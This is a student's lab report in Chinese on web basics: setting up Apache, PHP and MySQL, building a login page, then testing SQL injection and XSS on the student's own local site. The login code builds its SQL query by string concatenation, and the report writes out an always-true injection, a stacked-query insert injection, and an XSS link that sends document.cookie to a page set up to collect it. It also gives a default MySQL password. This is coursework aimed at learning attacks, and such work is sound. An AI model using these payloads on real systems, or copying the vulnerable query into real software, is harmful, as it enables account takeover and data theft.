20145313张雪纯Exp8 Web基础
回答问题
(1)什么是表单
表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 表单按钮:包括提交按钮、复位按钮和一般按钮;用于将数据传送到服务器上的CGI脚本或者取消输入,还可以用表单按钮来控制其他定义了处理脚本的处理工作。
(2)浏览器可以解析运行什么语言。
html,css,javascript,如果想运行其他语言,需要安装插件。
(3)WebServer支持哪些动态语言
python、nodejs、php、ruby等。
2.实验总结与体会
这个实验太难了,Java学得不好,web一般,php没学过,为什么我要选它??思考人生...........
实验步骤
Web前端HTML
-
使用
apachectl start
开启Apach,使用netstat -aptn
查看端口占用.由于OPEN VAS使用80端口,把配置端口文件中把默认监听端口改成8088。
-
重启Apache服务
-
打开127.0.0.1:8088,测试服务是否已成功启动.打开显示为上次实验生成的钓鱼网站
-
在
/var/www/html
文件夹下生成一个测试文件,测试网页是否能调取文件夹中的文件
- 编写一个简单的登录界面网页。
- 输入用户名密数据传输至action中的5313.php中,但是由于未定义无法显示
- 测试php功能
Web前端javascipt
- 验证用户名、密码
String sql="select * from users where username="+"'"+username+"'";//定义一个查询语句
ResultSet rs=db.executeQuery(sql);//运行上面的语句
if(rs.next())
{
if(password.equals(rs.getObject("password"))){
response.sendRedirect("loginsuccess.jsp"); //如果密码匹配则跳转至loginsuccess.jsp
}
else{
out.print("<script language='javaScript'> alert('密码错误');</script>");
response.setHeader("refresh", "0;url=login.jsp");
}
}
else
{
out.print("<script language='javaScript'> alert('请输入用户名——else');</script>");
response.setHeader("refresh", "0;url=login.jsp");
}
Web后端
-
/etc/init.d/mysql start
启动MySQL
-
mysql -u root –p
登录MySQL,默认密码为p@ssw0rd
-
show databases;
查看基本信息,显示出有多少数据库。
-
建库建表
CREATE SCHEMA `库表的名称`;
CREATE TABLE `库表的名称`.`users` (
`userid` INT NOT NULL COMMENT '',
`username` VARCHAR(45) NULL COMMENT '',
`password` VARCHAR(256) NULL COMMENT '',
`enabled` VARCHAR(5) NULL COMMENT '',
PRIMARY KEY (`userid`) COMMENT '');
- 添加数据记录
use ‘库表名称’
insert into users(userid,username,password,enabled) values(1,'用户id',password("用户密码"),"TRUE");
-
查看用户,修改密码,更新权限
- 输入
use mysql;
,选择mysql数据库 - 输入
select user, password, host from user;
,mysql库中的user表中存储着用户名、密码与权限 - 输入
UPDATE user SET password=PASSWORD("新密码") WHERE user='root'
; - 输入
flush privileges;
,更新权限 - 输入
quit
退出
- 输入
-
编写登录界面login.html
-
编写连接数据库login.php
-
用添加的数据记录进行登录
-
5秒后转至欢迎界面
SQL注入,XSS攻击测试
SQL攻击
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
永真式攻击
在用户名输入框中输入' or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为
select * from users where username='' or 1=1#' and password=md5('')
由于以“ #”号开头直到行尾的所有内容都认为是注释,所以以上语句等价为
select * from users where username='' or 1=1
再等价为
1=1
为永真式,永远成立。
SQL注入
-
先构造sql注入语句,在数据库中添加数据。
';insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");#
同上,等价于
SELECT * FROM users WHERE username='';
insert into users(userid,username,password,enabled) values(999,'111',password("222"),"TRUE");
-
连接成功,完成注入
-
使用注入的数据进行登录
XSS攻击
XSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。
- 先建立一个网站test5313.html, 用来接收“偷”来的信息。然后构造一个恶意链接,诱使用户点击。如
http://127.0.0.1:8088/logIn.php?term=<script>window.open("http://127.0.0.1:8088/test5313.php?cookie="+document.cookie)</script>
. - 用户点击了这个URL,嵌入在URL中的恶意Javascript代码就会在用户的浏览器中执行. 其在127.0.0.1:8088/logIn.php网站的cookie, 就会被发送到127.0.0.1:8088/test5313.html网站中。即可实现对用户身份的盗取。
- 点击构造的url,自动转至原网页
用XSS实现在输入特定字符串后显示图片:
使用cookie进行登录
-
cookie指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。
-
相关代码ltc已上传至git:http://git.oschina.net/alovera/webhuihuaguanli/tree/master
-
在网站默认目录下建立logIn.php,logOut.php,loged.php
-
首先在logIn中登录,关闭网页后再次打开不需要再次登录。想退出时点击log out即可。
实现发帖功能
- 使用data.txt的写入读取实现发帖、查看已发布帖子。